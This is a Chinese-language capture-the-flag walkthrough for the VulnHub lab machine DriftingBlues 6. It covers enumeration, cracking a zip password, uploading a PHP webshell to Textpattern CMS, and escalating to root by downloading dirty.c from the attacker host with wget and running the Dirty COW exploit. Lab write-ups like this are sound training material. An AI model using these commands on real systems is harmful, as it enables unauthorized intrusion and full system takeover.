一、介绍

运行环境：Virtualbox

攻击机：kali（10.0.2.15）

靶机：driftingblues6（10.0.2.22）

目标：获取靶机root权限和flag

靶机下载地址：https://www.vulnhub.com/entry/driftingblues-6,672/

二、信息收集

使用nmap主机发现靶机ip：10.0.2.22

使用nmap端口扫描发现靶机开放端口：80

打开网站没有发现可以利用的功能点，查看源码未发现隐藏数据

使用dirsearch工具爆破目录

dirsearch -u http://10.0.2.22/ 

dirsearch -u http://10.0.2.22/textpattern/ 

dirsearch -u http://10.0.2.22/textpattern/textpattern/

访问/robots.txt

User-agent: *
Disallow: /textpattern/textpatterndont forget to add .zip extension to your dir-brute
;)

访问/textpattern/README可以看到该网站为Textpattern CMS版本为4.8.3

根据提示使用dirbuster工具进行目录爆破，爆破.zip

获取爆破得到的zip文件，解压，发现需要输入密码

使用fcrackzip工具进行暴力破解，得到密码：myspace4

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u spammer.zip 

将压缩文件解压，得到用户名密码：mayer:lionheart

尝试登录网站，登录成功

三、漏洞利用

登录网站，查看网站各个功能点，发现存在文件上传功能，直接上传php webshell，上传成功

查看之前爆破的目录，有一个/textpattern/files/上传的webshell就放在在里面

直接访问webshell，反弹shell成功

四、提权

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

查看靶机系统内核版本uname -a，发现版本为：Linux 3.2.0-4

并且发现该靶机存在gcc环境which gcc

可以使用脏牛漏洞，该漏洞影响 Linux 2.6.22 版本至 4.6 版本的所有 Linux 系统。

在主机开启web服务，并在靶机下载提权脚本

攻击机：
service apache2 start     靶机：
wget http://10.0.2.15/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty

创建一个具有root权限的用户firefart，密码为你自己设置的密码：firefart\root

切换为firefart用户

获取flag，只发现了一个flag